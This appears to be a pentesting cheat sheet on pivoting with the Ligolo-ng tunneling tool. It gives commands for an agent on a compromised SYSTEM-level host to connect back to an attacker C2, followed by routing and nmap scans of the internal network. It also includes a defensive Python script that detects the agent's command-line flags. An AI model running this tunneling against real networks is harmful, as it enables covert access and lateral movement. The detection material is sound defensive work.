Ligolo-ng

An advanced, yet simple, tunneling tool that uses TUN interfaces.

https://github.com/nicocha30/ligolo-ng

Starting Ligolo

You should transfer an agent client to your target machine.

Setting up a NIC

When using Linux, you need to create a tun interface on the Proxy Server (C2):

#sudo ip tuntap add user [your_username] mode tun ligolo
#sudo ip link set ligolo up

Kali> sudo ip tuntap add user iptracej mode tun ligolo
Kali> sudo ip link set ligolo up
Kali> ifconfig

Starting a Proxy

# ./proxy -h # Help options 
Kali> proxy -selfcert

Starting an Agent

# $ ./agent -connect attacker_c2_server.com:11601 
CMD> .\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert
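
Seen from the defender's side, the agent command line above is a useful hunting signal in process-creation logs. The following is an added example, not code from the Ligolo-ng project or from this page's author: the function names, the scoring weights, and the sample log lines are assumptions made for illustration, and only the flags and port are taken from the command shown here.

```python
import re
import shlex

# Flags and port below come from the agent command shown on this page.
TARGET_RE = re.compile(r"^(?P<host>[^:\s]+):(?P<port>\d{1,5})$")
DEFAULT_PORT = 11601

def score_cmdline(cmdline):
    """Score one process command line; the binary name is ignored on
    purpose, because a renamed agent still carries the same flags."""
    try:
        argv = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        argv = cmdline.split()
    args = [a.strip('"').lower() for a in argv[1:]]
    score, reasons = 0, []
    for i, arg in enumerate(args):
        # Assumption: one or two leading dashes both introduce a flag.
        flag = arg.lstrip("-") if arg.startswith("-") else None
        if flag == "connect" and i + 1 < len(args):
            m = TARGET_RE.match(args[i + 1])
            if m:
                score += 2
                reasons.append("connect=" + args[i + 1])
                if int(m.group("port")) == DEFAULT_PORT:
                    score += 1
                    reasons.append("default-port")
        elif flag == "ignore-cert":
            score += 2
            reasons.append("ignore-cert")
        elif flag == "retry":
            score += 1
            reasons.append("retry")
    return score, reasons

def hunt(cmdlines, threshold=3):
    """Return (cmdline, score, reasons) for lines scoring >= threshold."""
    scored = [(c, *score_cmdline(c)) for c in cmdlines]
    return [hit for hit in scored if hit[1] >= threshold]

# Constructed sample command lines (not real telemetry).
SAMPLE = [
    r".\agent.exe -connect 172.16.11.11:11601 -retry -ignore-cert",
    r"C:\Users\Public\updater.exe --connect 203.0.113.7:443 -ignore-cert",
    r"C:\Windows\System32\ping.exe -n 2 10.10.1.5",
    r"curl.exe --retry 3 https://example.com/file.zip",
]

if __name__ == "__main__":
    for cmd, score, reasons in hunt(SAMPLE):
        print(score, reasons, cmd)
```

The threshold of 3 means a lone `-retry` (as in the curl line) never alerts, while `-connect host:port` combined with `-ignore-cert` always does, whatever the executable is called.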

Proxy Operation

# INFO[0102] Agent joined.  name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.100.2:49719"

Use the 'session' command to select the agent. Enter the session number at the prompt.

#ligolo-ng »  
#? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.100.2:49719

Use the 'ipconfig' command to list the network interfaces of the selected agent.

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
┌───────────────────────────────────────────────┐
│ Interface 0                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet0                      │
│ Hardware MAC │ 00:0c:29:3c:a0:bb              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 192.168.100.2/24               │
└──────────────┴────────────────────────────────┘
┌───────────────────────────────────────────────┐
│ Interface 1                                   │
├──────────────┬────────────────────────────────┤
│ Name         │ Ethernet1                      │
│ Hardware MAC │ 00:0c:29:3c:a0:c5              │
│ MTU          │ 1500                           │
│ Flags        │ up|broadcast|multicast|running │
│ IPv4 Address │ 10.10.1.2/24                   │
└──────────────┴────────────────────────────────┘
┌──────────────────────────────────────────────┐
│ Interface 2                                  │
├──────────────┬───────────────────────────────┤
│ Name         │ Loopback Pseudo-Interface 1   │
│ Hardware MAC │                               │
│ MTU          │ -1                            │
│ Flags        │ up|loopback|multicast|running │
│ IPv6 Address │ ::1/128                       │
│ IPv4 Address │ 127.0.0.1/8                   │
└──────────────┴───────────────────────────────┘

Add a route to your target network

Kali> sudo ip route add 10.10.1.0/24 dev ligolo
Kali> ip route

# Remove the route
# Kali> sudo ip route del 10.10.1.0/24 dev ligolo

Start tunnel

#[Agent : NT AUTHORITY\SYSTEM@MS01] » 
#[Agent : NT AUTHORITY\SYSTEM@MS01] » INFO[1113] Starting tunnel to NT AUTHORITY\SYSTEM@MS01

Kali Commands

ping -c 2 <internal machine>
nmap -sC -sV <internal machine>
... 
